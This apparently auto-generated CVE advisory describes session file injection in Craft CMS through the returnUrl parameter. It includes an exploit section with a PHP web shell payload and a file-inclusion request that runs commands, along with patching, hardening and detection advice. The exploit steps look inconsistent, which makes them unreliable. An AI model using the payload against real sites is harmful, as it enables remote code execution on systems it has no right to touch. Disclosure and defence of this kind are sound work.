Craft CMS stores unsanitized user-provided content in session files, allowing unauthenticated attackers to inject arbitrary data. When an unauthenticated user accesses a protected page, Craft CMS redirects them to the login page and creates a session file (sess_
</code>) in <code>/var/lib/php/sessions</code>. The `returnUrl` parameter, which stores the originally requested URL, is not sanitized, enabling attackers to inject malicious content (e.g., PHP code) into the session file. If another vulnerability allows file inclusion or session file access, this could lead to remote code execution (RCE). Patched versions (5.7.5, 4.15.3) sanitize the `returnUrl` input. <h2 style="color: blue;">DailyCVE Form</h2> Platform: Craft CMS Version: <5.7.5, <4.15.3 Vulnerability: Session File Injection Severity: Moderate Date: May 8, 2025 <h2 style="color: blue;">What Undercode Say:</h2> <h2 style="color: blue;">Exploit:</h2> <h2 style="color: blue;">1. Send crafted request with malicious `returnUrl`:</h2> [bash] GET /admin HTTP/1.1 Host: target.com Cookie: CraftSessionId=injected
2. Session file (`sess_injected`) may contain:
returnUrl="};<?php system($_GET['cmd']);?>//"
3. Trigger file inclusion (if possible):
GET /index.php?page=/var/lib/php/sessions/sess_injected&cmd=id HTTP/1.1
Protection:
1. Update to Craft CMS 5.7.5 or 4.15.3.
2. Restrict session directory permissions:
chmod 700 /var/lib/php/sessions
3. Add input validation for `returnUrl`:
$returnUrl = filter_var($_GET['returnUrl'], FILTER_SANITIZE_URL);
4. Use PHP hardening:
session.serialize_handler = php_serialize open_basedir = /var/www:/tmp
Detection:
Scan for suspicious session files:
grep -r "<?php" /var/lib/php/sessions/
Mitigation:
Disable session auto-start if unused:
session.auto_start = 0
References:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
